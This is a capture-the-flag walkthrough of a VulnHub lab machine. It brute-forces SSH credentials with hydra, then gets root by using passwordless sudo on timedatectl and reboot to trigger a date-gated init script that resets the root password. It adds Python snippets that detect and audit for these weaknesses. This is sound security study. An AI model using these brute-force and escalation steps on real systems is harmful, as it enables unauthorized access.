By retrymp3, Instagram @retrymp3
Running netdiscover to find the machine's IP:
Currently scanning: 192.168.23.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.8.1 5c:a8:6a:d8:13:15 1 60 HUAWEI TECHNOLOGIES CO.,LTD
192.168.8.101 e8:d0:fc:87:53:03 1 60 Liteon Technology Corporation
192.168.8.104 08:00:27:8b:e1:b6 1 60 PCS Systemtechnik GmbH
Scanning for ports and services:
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 39:5e:bf:8a:49:a3:13:fa:0d:34:b8:db:26:57:79:a7 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsDP1G9p8pMW+TiKn0Exn6d2tGTTPGrKsIAlCWxUoZu/Jz+teqiDxZoQArXlhK/SgXXJv6ufJHMcgWhFOdGG/8Jfm46M7qURTWqTER5f7aNimHTvcBB/Zcnr1cSE+Yt3UgeguQ2VBTqPnESNjIinj5f7OrEJCG6Uvf221Wijzvb6KrYv5LNfrh8UJJ6ieis13aqvjwN1MQdKwMWYAV/2aPLME59TVyqneRDOvFZRDEPMHGJB3ZoNrlNudDf6UqZuLViplnkaN+SuxAWNXYG+g1fA578fNVIzI7bHAYDbCGFZh87TLKHvJvgqlWLDQvo8irzHlWvIpehvbpthnGIG0V
| 256 20:d7:72:be:30:6a:27:14:e1:e6:c2:16:7a:40:c8:52 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOedB//c64utUEo+gsmsh26dzZa0eMsc83InMyXD0rEepjTXqxbplJWFzx3rQSElxwdql+BsaQBI9qg+XROp9ZQ=
| 256 84:a0:9a:59:61:2a:b7:1e:dd:6e:da:3b:91:f9:a0:c6 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIwpzv0aEpNMhO0avZsZ46zXc0aPO2V+867IaJkhJuSN
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.18
| http-ls: Volume /
| SIZE TIME FILENAME
| 55K 2019-08-09 01:20 README.md
| 1.1K 2019-08-09 01:21 gallery.html
| 259K 2019-08-09 01:11 img_5terre.jpg
| 114K 2019-08-09 01:11 img_forest.jpg
| 663K 2019-08-09 01:11 img_lights.jpg
| 8.4K 2019-08-09 01:11 img_mountains.jpg
|_
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Index of /
MAC Address: 08:00:27:8B:E1:B6 (Oracle VirtualBox virtual NIC)
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Ports 22 and 80 are open. From the output we can already see the file listing of the website's root directory.
A lot of enumeration is needed for this box; I tried directory brute-forcing but got nothing worthwhile.
Since the only visible login available to me was through SSH, I tried to brute-force the username and password using hydra.
root@injmush:~/Desktop/vulnhub.vbox/broken_gallery# hydra -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt 192.168.8.104 ssh
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-06-20 10:00:23
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://192.168.8.104:22/
[22][ssh] host: 192.168.8.104 login: broken password: broken
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-06-20 10:00:34
Success! I found the credentials for the SSH login:
broken:broken
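A wordlist run like the one above leaves a very recognisable trail in sshd's log: a burst of failed logins from one source, then an "Accepted" for the same user. As an added example (not part of the original post), the Python below flags that pattern; the auth.log-style lines are constructed by me, and the 5-failures-in-60-seconds threshold is my own assumption.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample sshd lines (syslog format, as in /var/log/auth.log), not real
# captures: a burst of failures from one source, then an 'Accepted' for that user.
SAMPLE_LOG = """\
Jun 20 10:00:24 ubuntu sshd[1201]: Failed password for invalid user admin from 192.168.8.101 port 50110 ssh2
Jun 20 10:00:25 ubuntu sshd[1203]: Failed password for invalid user guest from 192.168.8.101 port 50112 ssh2
Jun 20 10:00:26 ubuntu sshd[1205]: Failed password for broken from 192.168.8.101 port 50114 ssh2
Jun 20 10:00:27 ubuntu sshd[1207]: Failed password for broken from 192.168.8.101 port 50116 ssh2
Jun 20 10:00:28 ubuntu sshd[1209]: Failed password for broken from 192.168.8.101 port 50118 ssh2
Jun 20 10:00:34 ubuntu sshd[1211]: Accepted password for broken from 192.168.8.101 port 50120 ssh2
Jun 20 10:15:02 ubuntu sshd[1300]: Accepted publickey for broken from 10.11.1.221 port 41000 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\d+\.\d+\.\d+\.\d+)"
)

def parse(line, year=2020):
    """Return (timestamp, result, user, ip) or None; syslog lines carry no year."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]

def find_bruteforce(log_text, threshold=5, window_s=60):
    """One finding per source IP with >= threshold failures inside window_s seconds.
    Each finding is (ip, failures_in_burst, user_accepted_afterwards_or_None)."""
    recent = defaultdict(list)   # ip -> timestamps of failures inside the window
    findings = {}
    for line in log_text.splitlines():
        ev = parse(line)
        if ev is None:
            continue
        ts, result, user, ip = ev
        if result == "Failed":
            recent[ip] = [t for t in recent[ip] if (ts - t).total_seconds() <= window_s]
            recent[ip].append(ts)
            if len(recent[ip]) >= threshold:
                findings.setdefault(ip, [0, None])[0] = len(recent[ip])
        elif ip in findings:
            findings[ip][1] = user   # burst then success: the password was likely guessed
    return [(ip, n, u) for ip, (n, u) in findings.items()]
```

On a real host, feed it the sshd lines from auth.log or `journalctl -u ssh`; a non-empty result with a user in the third field is the case worth paging on.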
Now logging in through SSH:
root@injmush:~/Desktop/vulnhub.vbox/broken_gallery# ssh broken@192.168.8.104
The authenticity of host '192.168.8.104 (192.168.8.104)' can't be established.
ECDSA key fingerprint is SHA256:6iK6MbJOGAwgxFmxooFsdDj4+MUBHpeR4l54CPQQGhQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.8.104' (ECDSA) to the list of known hosts.
broken@192.168.8.104's password:
Welcome to Ubuntu 16.04 LTS (GNU/Linux 4.4.0-21-generic x86_64)
* Documentation: https://help.ubuntu.com/
762 packages can be updated.
458 updates are security updates.
New release '18.04.4 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Last login: Fri Aug 9 02:40:48 2019 from 10.11.1.221
broken@ubuntu:~$
I checked whether the user broken has any sudo rights:
broken@ubuntu:~$ sudo -l
Matching Defaults entries for broken on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User broken may run the following commands on ubuntu:
(ALL) NOPASSWD: /usr/bin/timedatectl
(ALL) NOPASSWD: /sbin/reboot
So the user can run the reboot and timedatectl commands as root without a password.
I checked GTFOBins for both but found nothing usable. I then listed the home directory and noticed that .bash_history is non-empty.
broken@ubuntu:~$ ls -la
total 124
drwxr-xr-x 17 broken broken 4096 Aug 9 2019 .
drwxr-xr-x 3 root root 4096 Aug 9 2019 ..
-rw------- 1 broken broken 3670 Jan 1 2018 .bash_history
-rw-r--r-- 1 broken broken 220 Aug 9 2019 .bash_logout
-rw-r--r-- 1 broken broken 3771 Aug 9 2019 .bashrc
drwx------ 14 broken broken 4096 Aug 9 2019 .cache
drwx------ 17 broken broken 4096 Aug 9 2019 .config
drwx------ 3 root root 4096 Aug 9 2019 .dbus
drwxr-xr-x 2 broken broken 4096 Aug 9 2019 Desktop
-rw-r--r-- 1 broken broken 25 Aug 9 2019 .dmrc
drwxr-xr-x 2 broken broken 4096 Aug 9 2019 Documents
drwxr-xr-x 2 broken broken 4096 Aug 9 2019 Downloads
-rw-r--r-- 1 broken broken 8980 Aug 9 2019 examples.desktop
drwx------ 2 broken broken 4096 Aug 9 2019 .gconf
drwx------ 3 broken broken 4096 Aug 9 2019 .gnupg
-rw------- 1 broken broken 636 Aug 9 2019 .ICEauthority
drwx------ 3 broken broken 4096 Aug 9 2019 .local
drwx------ 4 broken broken 4096 Aug 9 2019 .mozilla
drwxr-xr-x 2 broken broken 4096 Aug 9 2019 Music
drwxr-xr-x 2 broken broken 4096 Aug 9 2019 Pictures
-rw-r--r-- 1 broken broken 675 Aug 9 2019 .profile
drwxr-xr-x 2 broken broken 4096 Aug 9 2019 Public
-rw-r--r-- 1 broken broken 0 Aug 9 2019 .sudo_as_admin_successful
drwxr-xr-x 2 broken broken 4096 Aug 9 2019 Templates
drwxr-xr-x 2 broken broken 4096 Aug 9 2019 Videos
-rw------- 1 broken broken 5412 Aug 8 2019 .viminfo
-rw------- 1 broken broken 51 Aug 9 2019 .Xauthority
-rw------- 1 broken broken 1234 Aug 9 2019 .xsession-errors
-rw------- 1 broken broken 1244 Aug 8 2019 .xsession-errors.old
So I printed the file to see the commands previously run on this machine:
broken@ubuntu:~$ cat .bash_history
timedatectl set-time '2019-08-08 13:45'
date
cd /etc/init.d/
cat password-policy.sh
./password-policy.sh
date
reboot
cat /etc/init.d/password-policy.sh
From the history we can see that a script named password-policy.sh runs on reboot, since it lives in /etc/init.d/. Unfortunately there is no write permission on the file for us, but it is owned by root and can be read and executed by anyone.
So I printed the file to see whether this script calls anything else:
broken@ubuntu:~$ cat /etc/init.d/password-policy.sh
#!/bin/bash
DAYOFWEEK=$(date +"%u")
echo DAYOFWEEK: $DAYOFWEEK
if [ "$DAYOFWEEK" -eq 4 ]
then
  sudo sh -c 'echo root:TodayIsAgoodDay | chpasswd'
fi
#if [ "$DAYOFWEEK" == 4 ]
So the script says: if DAYOFWEEK equals 4, the root password is changed to TodayIsAgoodDay. The plan, then, is to set the system date so that today is the fourth day of the week and reboot, so that password-policy.sh runs and the password gets changed.
broken@ubuntu:~$ sudo timedatectl set-time '2020-6-18 10:00:00'
The date 2020-6-18 is a Thursday, which is the fourth day of the week, so the password change will run on the next reboot.
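The escalation above needs two ingredients at once: passwordless sudo on binaries that move the clock or force a reboot, and a boot-time script that sets a password depending on the date. As an added example (not from the original post), this Python audit checks for both; the sudo -l text and the script body are constructed from the walkthrough's own output, and the binary list and regexes are my assumptions.

```python
import re

# Constructed inputs modelled on this box's 'sudo -l' output and
# /etc/init.d/password-policy.sh (an extra non-NOPASSWD rule added as a control).
SUDO_L_OUTPUT = """\
User broken may run the following commands on ubuntu:
    (ALL) NOPASSWD: /usr/bin/timedatectl
    (ALL) NOPASSWD: /sbin/reboot
    (ALL) /usr/bin/apt-get
"""
INIT_SCRIPT = """\
#!/bin/bash
DAYOFWEEK=$(date +"%u")
if [ "$DAYOFWEEK" -eq 4 ]
then
  sudo sh -c 'echo root:TodayIsAgoodDay | chpasswd'
fi
"""

# Binaries that move the clock or force boot-time scripts to run (my own list).
CLOCK_OR_BOOT = {"timedatectl", "date", "hwclock", "reboot", "shutdown", "systemctl"}
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+(?P<tags>(?:\w+:\s*)*)(?P<cmd>\S+)")

def risky_sudo_rules(sudo_l_text):
    """(command, run-as) for every NOPASSWD rule on a clock/boot-control binary."""
    hits = []
    for line in sudo_l_text.splitlines():
        m = RULE_RE.match(line)
        if m and "NOPASSWD" in m["tags"] and m["cmd"].rsplit("/", 1)[-1] in CLOCK_OR_BOOT:
            hits.append((m["cmd"], m["runas"]))
    return hits

def credential_setting_lines(script_text):
    """Line numbers that set a password non-interactively, plus whether the
    script branches on the date (so a clock change can trigger that branch)."""
    lines = script_text.splitlines()
    setters = [i + 1 for i, l in enumerate(lines)
               if re.search(r"\b(chpasswd|passwd\s+--stdin|usermod\s+-p)\b", l)]
    date_gated = any(re.search(r"\bdate\b", l) for l in lines)
    return setters, date_gated

def assess(sudo_l_text, script_text):
    """Both findings together mean an unprivileged user could reset root's
    password by changing the date and rebooting, as the walkthrough shows."""
    rules = risky_sudo_rules(sudo_l_text)
    setters, date_gated = credential_setting_lines(script_text)
    return {"risky_rules": rules, "setter_lines": setters, "date_gated": date_gated,
            "chainable": bool(rules) and bool(setters) and date_gated}
```

The fix on a real host is to drop the NOPASSWD entries (or restrict timedatectl to a read-only subcommand) and to never set credentials from an init script; re-running assess() afterwards should report chainable False.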
broken@ubuntu:~$ sudo /sbin/reboot
Connection to 192.168.8.104 closed by remote host.
Connection to 192.168.8.104 closed.
Logging in again and switching to root with the new password:
root@injmush:~/Desktop/vulnhub.vbox/broken_gallery# ssh broken@192.168.8.104
broken@ubuntu:~$ su
Password:TodayIsAgoodDay
root@ubuntu:/home/broken# id
uid=0(root) gid=0(root) groups=0(root)